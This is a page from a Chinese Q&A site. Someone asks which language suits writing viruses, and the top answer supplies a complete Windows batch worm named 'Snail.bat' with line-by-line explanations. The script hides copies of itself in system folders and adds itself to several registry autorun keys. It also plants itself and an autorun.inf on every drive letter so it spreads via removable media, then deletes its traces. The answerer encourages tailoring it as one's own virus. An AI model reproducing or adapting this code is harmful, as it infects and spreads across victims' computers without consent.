永发信息网

精通编程的来

答案:1  悬赏:60  手机版
解决时间 2021-07-30 12:18

1.底层一点的

2.能触及系统所有方面的

3.最好能用记事本编的

4.不要像VS那样要装那么大的编程工具

5.怎么说呢,就是适合写病毒的

最佳答案

那就是批处理(*.BAT)病毒吧,不用编程工具。你看看下面的程序怎么样,够劲吧!


@ECHO OFF这条语句是关闭回显功能 就是不显示你的这些代码 直接执行 如果将OFF 改为 ON 则每运行一条都要显示一条代码
cls 这个是清屏命令
md d:\蜗牛\ 建立目录命令 在D盘建立个叫蜗牛的文件夹 在DOS里把现在的文件夹叫做目录
attrib %0 -H -S -R 文件属性命令 %0代表这个文件本身 -H 是去掉隐藏属性 -S 是去掉系统属性 -R 去掉只读属性 如果把 减号改为加号 就是给文件增加相应的属性
Copy %0 d:\蜗牛\Snail.bat 拷贝命令 相当于现在的 复制加粘贴命令 将本身复制到刚才建立的目录里
Copy %0 %systemroot%\Snail.bat 将本身复制到系统文件夹
Copy %0 %systemroot%\system32\Snail.bat 同上
attrib d:\蜗牛 +h +s +r 将刚建立目录里的副本加上 隐藏 系统 和只读属性
cls 清屏


Echo REGEDIT4>reg.reg 将 REGEDIT4这些字符 写到文件 reg.reg中
Echo [HKEY_CLASSES_ROOT\Folder\shell\运行=蜗牛=]>>reg.reg 将[HKEY_CLASSES_ROOT\Folder\shell\运行=蜗牛=]追加到reg.reg中,追加就是说以前的内容不被覆盖
Echo ""="运行=蜗牛=">>reg.reg 同上
regedit /s reg.reg 导入注册表 因为reg.reg就是注册表的文件
Del reg.reg 删除刚才的注册表文件 这个东西应该是个病毒,病毒的扩散,隐藏,自启动功能都已经有了
Echo REGEDIT4>reg1.reg
Echo [HKEY_CLASSES_ROOT\Folder\shell\运行=蜗牛=\command]>>reg1.reg
Echo ""="Snail.bat">>reg1.reg
regedit /s reg1.reg
Del reg1.reg reg1.reg同上面的reg.reg一样是把自己写到另外一个自启动项里
Echo REGEDIT4>reg2.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]>>reg2.reg
Echo "system_exe"="Snail.bat">>reg2.reg
regedit /s reg.reg
Del reg2.reg 同上面的reg.reg一样是把自己写到另外一个自启动项里
Echo REGEDIT4>reg3.reg
Echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start


Menu\Programs\=蜗牛=]>>reg3.reg
Echo "=蜗牛="="Snail.bat">>reg3.reg
regedit /s reg3.reg
Del reg3.reg 同上面的reg.reg一样是把自己写到另外一个自启动项里 哇好厉害啊 所有的能自启动的位置 都被他占领了
cls


echo [autorun]>tmp.inf 这是建立个配置文件
echo open=Snail.bat>>tmp.inf 下面几句就是 向tmp.inf中写入代码
echo shellexecute=Snail.bat>>tmp.inf
echo shell/QQ89017943/command=Snail.bat>>tmp.inf


attrib %systemroot%\Snail.bat -h -s -r 去掉文件的隐藏 系统 只读属性
attrib %systemroot%\system32\Snail.bat -h -s -r 同上



for %%i in (z y x w v u t s r q p o n m l k j i h g f e d c b a) do ( 循环自动检测从A盘到Z盘所有驱动器
if exist %%i: ( 如果返回成功 就是说该盘存在
attrib %%i:\Snail.bat -h -s -r 则拷贝病毒体 这里我只大略的写了啊
attrib %%i:\autorun.inf -h -s -r
copy %0 %%i:\Snail.bat
copy tmp.inf %%i:\Autorun.inf
attrib %%i:\Snail.bat +h +s +r 加上相关属性 起到隐藏的目的
attrib %%i:\autorun.inf +h +s +r
))



copy %0 %systemroot%\Snail.bat 拷贝本身到 系统文件夹
copy %0 %systemroot%\system32\Snail.bat



cls 清屏


attrib %systemroot%\Snail.bat +h +s +r 系统文件夹的副本也加上属性 起到隐藏作用


attrib %systemroot%\system32\Snail.bat +h +s +r



echo REGEDIT4>system.reg 建立注册表,使本身能自动运行
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>system.reg
echo "system"="Snail.bat">>system.reg


regedit /s system.reg


del tmp.inf 删除作案痕迹 。
del system.reg


cls 清屏



exit 退出窗口


这段病毒程序是我在问问上看到的 注释是我加的,你只要稍微做下修改就可以变成你自己的了。不要追求什么语言,算法才是第一位的。

我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
电脑上网网速很慢是怎么回事?怎么处理?
ESET NOD32杀毒软件更新问题 有图
顺河回族区开封泰山饭庄地址在哪,我要去那里
有酒有朋友的诗句,上联:有酒有肉有朋友,下联:
怎样能快速赚钱但是又不犯法
3D3S是否能做钢结构深化设计
创华通讯(陶庄路)我想知道这个在什么地方
请内行解答户口档案问题,急!急!急!
东西湖区武汉神龙通达物流有限公司这个地址怎
有没有谁在乎欧亞诗?
电脑打不开FLAS为什么?
彩虹岛的专职道具升级材料要怎么获得?
赛尔号顽皮的布鲁好不好?有图!
为什么我原来的Q号被盗了呢?
去应聘有没有好的应对办法使自己不紧张
推荐资讯
C1科目2考试,补考的时候缺考下次在考还要交
奥法怎么控蓝啊 3奥冲一弹幕 泄蓝太快 打布胖
DNF在哪里下载
奥黛丽、赫本怎么那么美、那神态
热门网游??
栾川县洛阳满堂红火锅店(栾川旗舰店)地址是什
怎样合并子网掩码
QQ丝路英雄如何点亮?
骸麒的骨戒在哪图掉落?希望打到过的回答下。
我的QQ号怎么给列入黑名单了
石鼓区衡阳市莲湖路代售点这个地址在什么地方
湛河区平顶山宇鑫物流服务部地址在哪里啊
正方形一边上任一点到这个正方形两条对角线的
阴历怎么看 ?